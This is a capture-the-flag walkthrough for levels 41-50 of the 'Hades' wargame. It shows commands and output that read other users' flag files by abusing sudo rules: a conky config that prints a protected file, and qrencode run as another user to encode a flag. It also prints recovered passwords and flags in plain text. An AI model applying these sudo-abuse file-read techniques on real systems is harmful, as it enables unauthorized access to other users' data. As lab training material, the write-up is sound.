Hades 41-50
User -
flag - 41
任务目标
行动
User -
flag - 42
任务目标
行动
Exploit it
athena@hades:~$ cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.66.0.66 hades
127.0.0.1 hades.hmv
127.0.0.1 whatsmypass.hmv
athena@hades:~$ curl whatsmypass.hmv
HXisrOPSdTcSSTEyyaLn
User - nyx
flag - 43
^BdYvJtfaTyfaliZPBkG^
任务目标
mission.txt
User pallas has her desktop tuned with conky.
行动
ls -lah
drwxr-x--- 2 root nyx 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 nyx nyx 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 nyx nyx 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 nyx nyx 807 Apr 23 2023 .profile
-rw-r----- 1 root nyx 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root nyx 171 Jul 26 2023 mission.txt
使用以下配置文件
conky.config = {
alignment = 'top_left',
background = false,
border_width = 1,
cpu_avg_samples = 2,
default_color = 'white',
default_outline_color = 'white',
default_shade_color = 'white',
double_buffer = true,
draw_borders = false,
draw_graph_borders = true,
draw_outline = false,
draw_shades = false,
extra_newline = false,
gap_x = 60,
gap_y = 60,
minimum_height = 5,
minimum_width = 5,
net_avg_samples = 2,
no_buffers = true,
out_to_console = true,
out_to_ncurses = false,
out_to_stderr = false,
out_to_x = false,
own_window = true,
own_window_class = 'Conky',
own_window_type = 'desktop',
show_graph_range = false,
show_graph_scale = false,
stippled_borders = 0,
update_interval = 1.0,
uppercase = false,
use_spacer = 'none',
use_xft = true,
}
conky.text = [[
${color grey}Info:$color ${scroll 32 Conky $conky_version - $sysname $nodename $kernel $machine}
$hr
${color grey}Uptime:$color $uptime
${color grey}Frequency (in MHz):$color $freq
${color grey}Frequency (in GHz):$color $freq_g
${color grey}RAM Usage:$color $mem/$memmax - $memperc% ${membar 4}
${color grey}Swap Usage:$color $swap/$swapmax - $swapperc% ${swapbar 4}
${color grey}CPU Usage:$color $cpu% ${cpubar 4}
${color grey}Processes:$color $processes ${color grey}Running:$color $running_processes
$hr
${color grey}File systems:
/ $color${fs_used /}/${fs_size /} ${fs_bar 6 /}
${color grey}Networking:
Up:$color ${upspeed} ${color grey} - Down:$color ${downspeed}
$hr
${color grey}Name PID CPU% MEM%
${color lightgrey} ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}
${color lightgrey} ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}
${color lightgrey} ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}
${color lightgrey} ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}
${head /pwned/pallas/flagz.txt 30}
]]
Exploit it
nyx@hades:~$ sudo -l
Matching Defaults entries for nyx on hades:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User nyx may run the following commands on hades:
(pallas) NOPASSWD: /usr/bin/conky
nyx@hades:~$ nano /var/tmp/tessssssst-conky.conf
nyx@hades:~$ sudo -u pallas /usr/bin/conky -c /var/tmp/tessssssst-conky.conf
conky: drawing to single buffer
conky: invalid setting of type 'table'
Info:
Uptime: 193d 23h 55m
Frequency (in MHz): 2400
Frequency (in GHz): 2.40
RAM Usage: 1.01GiB/1.94GiB - 52% #####.....
Swap Usage: 0B/0B - 0% ..........
CPU Usage: 6% #.........
Processes: 106 Running: 0
File systems:
/ 8.75GiB/18.8GiB #####.....
Networking:
Up: 0B - Down: 0B
Name PID CPU% MEM%
bash 4185872 0.00 0.13
bash 4185829 0.00 0.18
script 4185828 0.00 0.05
sh 4185827 0.00 0.04
^irzKewMCfnhnIMTCJlW^
User - pallas
flag - 44
^irzKewMCfnhnIMTCJlW^
任务目标
mission.txt
User pandora likes squares.
行动
ls -lah
-rw-r--r-- 1 pallas pallas 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 pallas pallas 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 pallas pallas 807 Apr 23 2023 .profile
-rw-r----- 1 root pallas 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root pallas 145 Jul 26 2023 mission.txt
Exploit it
pallas@hades:~$ sudo -u pandora /usr/bin/qrencode -r /pwned/pandora/flagz.txt -o /var/tmp/tesssssssst-pandora.txt; base64 /var/tmp/tesssssssst-pandora.txt
iVBORw0KGgoAAAANSUhEUgAAAGMAAABjAQMAAAC19SzWAAAABlBMVEUAAAD///+l2Z/dAAAAAnRS
TlP//8i138cAAAAJcEhZcwAACxIAAAsSAdLdfvwAAADtSURBVDiNzdQxjsQgDAVQIwp3kwsg5RrT
cSW4wLC5wOZKdFwDiQtAR4HWazQrbZqsU8xI6yoPyUr84wToWPCPVQE8DRVBSWo0fAef+EJSNM4a
lbj7gpD7LumBul0RDYfUfp/sVHO+ZPxh2jPNiiMcEjxTtRDSuvesJHHtHBuZIIn7bjgW0iQKS7Um
RD4Q1GL2vXzh2kR12tL6YfUuiSI8AG6Qg6hUZisvl6R6H7wCXIskroqcmd4k8bsNVFr6SfcPzX2x
HINRonhb79nB8w6CAhnA9ZI6OMiLqPn9lU80ong+h3pPtEl6/7/nFfoGYZyvP9kwcFcAAAAASUVO
RK5CYII=
# ^pjDuPNQVgyhgigOIiwm^
解码即可
User - pandora
flag -
^pjDuPNQVgyhgigOIiwm^
任务目标
mission.txt
User penelope lets us do something...